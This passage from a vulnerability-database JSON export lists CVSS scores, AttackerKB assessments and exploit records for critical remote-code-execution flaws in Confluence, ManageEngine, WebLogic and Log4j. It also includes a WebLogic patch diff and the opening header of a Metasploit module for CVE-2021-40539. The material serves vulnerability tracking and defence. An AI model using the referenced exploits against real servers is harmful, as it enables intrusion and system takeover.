"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T07:37:58", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": 
"2021-11-23T15:51:23", "id": "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:30:10", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084"], "modified": "2021-11-23T15:51:23", "id": "CD8CABD7-BE65-5434-B682-F73ABA737C65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T04:37:44", "description": "# PocList\r\n\r\n\u81ea\u5199\u7684\u6f0f\u6d1ePOC\u548cEXP\u5408\u96c6\u3002\r\n\r\nPOC\u811a\u672c\u6307\u5b9aurl\u6587\u4ef6\u540e\uff0c\u53ef\u591a\u7ebf\u7a0b\u6279\u91cf\u626b\u63cf\u76ee\u6807\u8fdb\u884c\u9a8c\u8bc1\uff1bEXP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-22T05:06:33", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zeroshell", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2021-26084", "CVE-2021-36749"], "modified": "2022-04-01T01:33:01", "id": "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-01-18T20:31:26", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. 
This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-07T11:31:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. 
Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T01:44:12", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). 
Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:47", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. 
Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14883 \u2014 Authenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14883", "CVE-2021-26084"], "modified": "2020-10-29T00:00:00", "id": "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "href": "https://attackerkb.com/topics/XrIT8vLY22/cve-2020-14883-authenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-02T17:14:41", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 02, 2020 10:26pm UTC reported:\n\nCVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882\u2019s [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.\n \n \n --- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 13:13:28.000000000 -0600\n +++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 12:11:01.000000000 -0600\n @@ -2,6 +2,7 @@\n \n import com.bea.netuix.servlets.manager.SingleFileServlet;\n import java.io.IOException;\n +import java.util.List;\n import javax.servlet.ServletConfig;\n import javax.servlet.ServletException;\n import javax.servlet.ServletRequest;\n @@ -20,8 +21,6 @@\n \n private static final long serialVersionUID = 1L;\n \n - private static final String[] IllegalUrl = new String[] { \";\", \"%252E%252E\", \"%2E%2E\", \"..\", \"%3C\", \"%3E\", \"<\", \">\" };\n - \n public static void initMBean() {\n MBeanUtilsInitializer.initMBeanAsynchronously();\n }\n 
@@ -39,8 +38,9 @@\n if (req instanceof HttpServletRequest) {\n HttpServletRequest httpServletRequest = (HttpServletRequest)req;\n String url = httpServletRequest.getRequestURI();\n - for (int i = 0; i < IllegalUrl.length; i++) {\n - if (url.contains(IllegalUrl[i])) {\n + if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))\n + throw new ServletException(\"User not authenticated.\"); \n + if (!isValidUrl(url, httpServletRequest)) {\n if (resp instanceof HttpServletResponse) {\n LOG.error(\"Invalid request URL detected. \");\n HttpServletResponse httpServletResponse = (HttpServletResponse)resp;\n @@ -49,7 +49,6 @@\n return;\n } \n } \n - } \n try {\n super.service(req, resp);\n } catch (IllegalStateException e) {\n 
@@ -60,4 +59,15 @@\n LOG.debug(e); \n } \n }\n + \n + private boolean isValidUrl(String url, HttpServletRequest req) {\n + String consoleContextPath = ConsoleUtils.getConsoleContextPath();\n + List<String> portalList = ConsoleUtils.getConsolePortalList();\n + for (String portal : portalList) {\n + String tmp = \"/\" + consoleContextPath + portal;\n + if (url.equals(tmp))\n + return true; \n + } \n + return false;\n + }\n }\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-14750 \u2014 Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2021-26084"], "modified": "2020-11-19T00:00:00", "id": "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "href": "https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T18:27:50", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-23T13:18:51", "description": "This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": 
"NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "1337DAY-ID-37080", "href": "https://0day.today/exploit/description/37080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 
